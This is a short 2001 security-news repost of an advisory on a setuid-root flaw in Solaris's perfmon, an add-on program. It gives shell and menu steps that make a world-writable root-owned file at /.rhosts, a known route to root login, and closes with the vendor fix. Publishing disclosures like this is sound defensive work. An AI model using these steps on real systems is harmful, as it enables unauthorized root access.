Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » SunOS application perfmon vulnerability

SunOS application perfmon vulnerability

by phiber on March 23rd, 2001 System: Solaris 2.X
Parm is a program that displays system information.
Parm is SunOS application. It's not included in Solaris basic package.

There is a vulneribility in perfmon program that you can create any file with root privilege....


$ whoami

loveyou

$ umask 0000

$ /opt/JSparm/bin/perfmon &





Choose Logging -> Logging File

In Selection part, input the file path you want to create ex:) /.rhosts



following file is created in a second.

-rw-rw-rw- 1 root loveyou 144 Mar 9 03:14 .rhost





Solution:


Remove setuid permition, contact your vendor and get a patch.


Posted by KimYongJun [www.hackerslab.org] on a bt mailing list.


Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »